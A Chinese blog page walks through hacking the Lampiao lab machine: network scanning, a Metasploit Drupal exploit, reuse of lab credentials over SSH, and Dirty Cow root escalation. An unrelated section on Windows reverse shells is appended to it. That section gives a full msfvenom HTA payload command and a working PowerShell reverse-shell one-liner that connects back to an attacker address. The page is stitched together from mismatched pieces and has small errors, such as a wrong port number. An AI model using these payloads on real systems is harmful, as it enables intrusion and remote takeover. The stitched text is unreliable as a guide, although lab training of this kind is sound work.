以lampiao为靶机,复现脏牛提权

脏牛提权复现

脏牛(Dirty Cow)是Linux内核的一个提权漏洞,之所以叫Dirty Cow,Linux内核的内存子系统在处理写入复制(copy-on-write, cow)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限。

脏牛的CVE编号是CVE-2016-5195。

“Dirty Cow”缺陷存在于Linux内核的一部分,内核是每个发行版的一部分开源操作系统,包括
RedHat,Debian,发布的Ubuntu,差不多有十年了。最重要的是,研究人员指出“Dirty Cow”的漏洞攻击代码,正在积极利用。“Dirty Cow”可能允许任何安装恶意程序获得行政(root) 完全访问设备的权限和劫持。这个地方借助靶机Lampiao来演示具体提权流程。

脏牛提权脚本:https://github.com/gbonacini/CVE-2016-5195

靶机下载地址:https://mega.nz/file/aG4AAaDB#CBLRRYQsAhTOyPJqyjC0Blr-weMH9QMdYbPfMj0LGeM

存活主机发现

Kali ip ===> 192.168.15.100

  • 命令:nmap -sP 192.168.15.0/24

在这里插入图片描述

对目标IP地址进行端口扫描

  • 命令:nmap -p1-65535 192.168.15.107

在这里插入图片描述

发现开放了3个端口,分别是22、80、1898端口

访问开放端口

80端口:

在这里插入图片描述

1989端口:

在这里插入图片描述

相比较于80端口,这个端口所显示的信息更多,我们进行一下信息收集,发现以下信息

在这里插入图片描述

MSF

这里msf搜索drupal

在这里插入图片描述

使用第一个模块进行攻击

在这里插入图片描述

直接获取到meterpreter,getuid发现不是管理员权限

在这里插入图片描述

信息收集

输入ls -l,以此进入以下文件

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

发现了有个配置文件,进去查看,发现以下信息

在这里插入图片描述

找到用户名

在这里插入图片描述

这里我们尝试使用账号:tiago,密码:Virgulino,进行登录

因为之前看到开启了22端口,我们这里尝试ssh远程登录,登录进去了!!!但是不是管理员权限,所以接下来就是提权

在这里插入图片描述

提权

怎么确定是否存在脏牛提权呢?

通过uname -a命令来看:如果内核版本低于以下版本说明存在

Centos7 /RHEL7 3.10.0-327.36.3.el7
Cetnos6/RHEL6 2.6.32-642.6.2.el6
Ubuntu 16.10 4.8.0-26.28
Ubuntu 16.04 4.4.0-45.66
Ubuntu 14.04 3.13.0-100.147
Debian 8 3.16.36-1+deb8u2
Debian 7 3.2.82-1

在这里插入图片描述

说明存在脏牛提权漏洞,那么我们就准备脚本 ===> 脚本获取连接在最下方

利用nc上传文件到目标靶机

首先我们先进行监听

nc -l 9527 > CVE-2016-5195-master.zip

然后上传目标文件到靶机

nc 192.168.15.107 9527 < CVE-2016-5195-master.zip

查看目标靶机是否存在此文件 (再另起一个终端去上传!!!)

在这里插入图片描述

上传

nc 192.168.15.107 9527 < 1.tar.gz

在这里插入图片描述

解压然后编译

unzip CVE-2016-5195-master.zip
cd CVE-2016-5195-master
make

运行下图这个文件

在这里插入图片描述

得到密码:dirtyCowFun

在这里插入图片描述

提权成功!!!

在这里插入图片描述

### Windows 靶机反弹 Shell 和方法 #### 一、使用 Metasploit 实现反弹 Shell 为了创建一个可以用于反弹 Shell 的 payload 文件,可以通过 `msfvenom` 工具来完成。对于 Windows 系统而言,假设目标机器支持 x64 架构,则可采用如下命令生成 HTA 格式的 Payload: ```bash msfvenom -p windows/x64/shell_reverse_tcp LHOST=<vps_ip> LPORT=9090 -f hta-psh -o 1.hta ``` 此操作将会把生成的恶意文件保存为名为 "1.hta" 的文件[^3]。 当受害者访问这个 .hta 文件时,它会在受害者的计算机上执行并尝试连接到指定 IP 地址和端口上的监听器,从而建立反向 Shell 连接。 #### 二、通过 Netcat (nc) 创建简单 TCP 反弹 Shell 另一种较为基础的方式是在攻击者控制下的设备上启动监听服务,并让目标主机发送回连接请求。具体做法如下所示: - 攻击方设置好监听状态:`nc -lvp 4444` - 被控端执行相应指令以发起连接:`powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.41.142',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"` 上述 PowerShell 命令能够供更稳定的交互环境给攻击者[^2]。 #### 三、关于过程中的注意事项 一旦获得了初始级别的 Shell 访问限之后,下一步通常是试图升至更高层次的操作系统特级别。然而,在实际操作中需要注意以下几个方面的问题: - **网络配置**:确认攻击机与靶机处于相同网段内; - **架构匹配度**:确保所使用的 exploit 或 payload 符合目标系统的 CPU 类型(即 32-bit vs 64-bit),这可通过运行 `systeminfo` 来获取信息; - **持续性维护会话**:在整个渗透测试期间维持稳定的目标系统在线状况; - **漏洞适用范围**:考虑到某些安全更新可能已经修复了特定类型的弱点,因此应当针对未修补版本实施攻击策略; 最后一步是验证是否成功升了限等级,通常情况下可以借助于调用 `whoami` 或类似的内置工具来进行检查。如果显示的结果表明当前是以管理员身份登录的话,则说明操作顺利完成[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值